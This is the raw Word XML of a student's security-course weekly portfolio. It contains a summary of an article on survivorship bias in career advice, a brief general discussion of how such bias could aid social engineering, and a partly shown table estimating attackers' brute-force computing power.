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B24F" w14:textId="7966F5C7" w:rsidR="6816F7BF" w:rsidRPr="00ED5F6D" w:rsidRDefault="5146400E" w:rsidP="316224EB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>COMP6</w:t>
      </w:r>
      <w:r w:rsidR="7C7DC266" w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">41 Week </w:t>
      </w:r>
      <w:r w:rsidR="16168886" w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> Portfolio </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119C823" w14:textId="64D3BB2D" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143D4C8C" w14:textId="373CDBBE" w:rsidR="6816F7BF" w:rsidRPr="00ED5F6D" w:rsidRDefault="6816F7BF" w:rsidP="42D4980C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00901E67" w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Thomas Gosman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE12D93" w14:textId="4FB5A8D0" w:rsidR="6816F7BF" w:rsidRPr="00ED5F6D" w:rsidRDefault="6816F7BF" w:rsidP="42D4980C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>zID:</w:t>
      </w:r>
      <w:r w:rsidR="00901E67" w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> z5425064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEE0FC" w14:textId="72163228" w:rsidR="6816F7BF" w:rsidRPr="00ED5F6D" w:rsidRDefault="6816F7BF" w:rsidP="42D4980C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Date Submitted:</w:t>
      </w:r>
      <w:r w:rsidR="005656F6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17/06/27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AF247" w14:textId="19E61ECE" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCD295C" w14:textId="3660408D" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="64F38000" w:rsidP="42D4980C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FA490" w14:textId="6BC05748" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="35222D9E" w:rsidP="181B8E52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Security Everywhere</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="05BD8472" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F82C906" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="51CC8241" w14:textId="78DB4C54" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="2C4A28D2" w14:textId="71606AD8" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="589BEFD4" w14:textId="02332F07" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="4474B3E0" w14:textId="6105E153" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5ED3428E" w14:textId="038A15B2" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="21A34823" w14:textId="366D6F02" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="4671EB08" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="1D9BB07E" w14:textId="16349E02" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19BF2080" w14:textId="6D936089" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
    <w:p w14:paraId="4BDB72BC" w14:textId="62D27F17" w:rsidR="37D07EEC" w:rsidRPr="003567E5" w:rsidRDefault="6685B08B" w:rsidP="42D4980C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="0"/>
      <w:r w:rsidRPr="003567E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Humans, Measuring</w:t>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:r w:rsidR="00903D82" w:rsidRPr="003567E5">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C648BC" w14:textId="5F9EB89F" w:rsidR="336AB2E5" w:rsidRPr="00ED5F6D" w:rsidRDefault="37D07EEC" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Research a Cognitive Vulnerability</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="676A6E2F" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D66B848" w14:textId="005BBF0E" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="008825CF" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve">Title: </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5F6D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Beware survivorship bias in advice on science careers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3A8533" w14:textId="553005F2" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="00AB26CD" w:rsidP="181B8E52">
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve">Link: </w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="00ED5F6D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www-nature-com.wwwproxy1.library.unsw.edu.au/articles/d41586-021-02634-z</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705E6C68" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="78680083" w14:textId="77777777" w:rsidR="00D44FAA" w:rsidRDefault="0038476D" w:rsidP="181B8E52">
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve">The article published above explores anecdotally the survivorship bias present often in career advice. The article deduces that often advice is taken from senior members of a career path or field of research, whilst this appears wise there is an inherent biasing effect. This is because the senior members that remain will be the sample of successful people in their career as failed attempts will have either left that career path or changed their field of research. Hence often for career research we only hear from the successful side of the story rather than a balanced view. This can make us perceive that the pathway and probability of success to be more deterministic and in a </w:t>
            </w:r>
            <w:r w:rsidR="00ED5F6D" w:rsidRPr="00ED5F6D">
              <w:t>person’s</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve"> favour than in reality. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22A03408" w14:textId="096FD6E5" w:rsidR="00E9362C" w:rsidRDefault="00E9362C">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>When applied to a security context, survivorship bias can make a person’s behaviour easier to predict. For example, someone may strongly admire senior mentors, supervisors in high-paying industries, or relatives who have succeeded in selective fields. An attacker could use this pattern to create a social engineering scenario that feels personally relevant and trustworthy. They might impersonate or compromise the profile of a respected person in an engineering field, then send targeted information or opportunities that align with the victim’s career goals and fulfill the ease of progression that the victim is expecting. Because the message appears connected to someone the victim admires, the victim may be more willing to take risks they would usually question. This could help the attacker build trust, influence communication, and gradually create more opportunities to exploit the victim.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FD38DD" w14:textId="4E6701A4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="545A12E6" w14:textId="0F5E94FC" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="638C50E3" w14:textId="038A15B2" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="1607EE76" w14:textId="366D6F02" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="782C514D" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="2AE2330A" w14:textId="199B297D" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="285F3090" w14:textId="5D67B1BC" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7613E10F" w14:textId="77777777" w:rsidR="00E45EA2" w:rsidRPr="00ED5F6D" w:rsidRDefault="00E45EA2" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB4B761" w14:textId="0520DAEB" w:rsidR="1D136FCE" w:rsidRPr="00ED5F6D" w:rsidRDefault="3297DC1F" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Enigma Machine</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="09476DC2" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12F740F9" w14:textId="440E681F" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="455396D7" w14:textId="118CD246" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="736EC525" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5AEE8E44" w14:textId="78DB4C54" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5F3DBA38" w14:textId="4E6701A4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="18D9014C" w14:textId="1A9F3528" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="1BE34A16" w14:textId="038A15B2" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="2CD28604" w14:textId="366D6F02" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="71BEB523" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="2188A5E4" w14:textId="3E2CB08C" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="258907BA" w14:textId="11413CA9" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA69E64" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2876E0D0" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28AB3354" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BA0A60" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A559E9B" w14:textId="77777777" w:rsidR="00903D82" w:rsidRPr="00ED5F6D" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19228AC3" w14:textId="505BA9E6" w:rsidR="6E78A25E" w:rsidRPr="00ED5F6D" w:rsidRDefault="73EA0038" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Estimate Attacker Power</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="70A4C8B6" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6500EBA0" w14:textId="440E681F" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
            <w:commentRangeStart w:id="1"/>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9239" w:type="dxa"/>
              <w:tblCellSpacing w:w="15"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49"/>
              <w:gridCol w:w="1122"/>
              <w:gridCol w:w="1933"/>
              <w:gridCol w:w="2074"/>
              <w:gridCol w:w="2561"/>
            </w:tblGrid>
            <w:tr w:rsidR="00903D82" w:rsidRPr="00903D82" w14:paraId="381E14DA" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="616"/>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C0EC81E"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b/>
                      <w:bCs/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Attacker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E2002C2"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b/>
                      <w:bCs/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Budget</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="169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D16C0D7"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b/>
                      <w:bCs/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Hardware</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="204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CF0D564"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b/>
                      <w:bCs/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Bits of work per 24 hours</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="27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E373CA3"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b/>
                      <w:bCs/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Time to do 128 bits of work</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00903D82" w:rsidRPr="00903D82" w14:paraId="14AE6D49" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="887"/>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512CEA7"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Office Worker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D8EC63D"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$200 (plus company provided laptop)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="169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9580FD1" w14:textId="733A05E7" w:rsidR="00903D82" w:rsidRPr="00903D82" w:rsidRDefault="005B73AE" w:rsidP="00903D82">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AMD Ryzen 5 5600x 6 Cores</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="204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2638FED"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51</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="27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095707C" w14:textId="77777777" w:rsidR="00903D82" w:rsidRPr="00903D82" w:rsidRDefault="00903D82" w:rsidP="00903D82">
                  <w:pPr>
                    <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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2^77 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2009026A" w14:textId="77777777" w:rsidR="00903D82" w:rsidRPr="00903D82" w:rsidRDefault="00903D82" w:rsidP="00903D82">
                  <w:pPr>
                    <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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2^68 years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00903D82" w:rsidRPr="00903D82" w14:paraId="6AE410AE" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="312"/>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2A335A8"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Solo teenage Hacker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A4E20FB" w14:textId="77777777"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$10k</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="169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A5E6E8C" w14:textId="54170989" w:rsidR="00CA4D29" w:rsidRDefault="00903D82" w:rsidP="00CA4D29">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CA4D29">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Ryzen 9/ Intel Ultra 9 + </w:t>
                  </w:r>
                  <w:r w:rsidR="006157CB">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>RTX2000</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="32542ACF" w14:textId="6040DE53" w:rsidR="00CA4D29" w:rsidRPr="00903D82" w:rsidRDefault="00CA4D29" w:rsidP="00903D82">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 xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidR="006157CB">
                    <w:rPr>
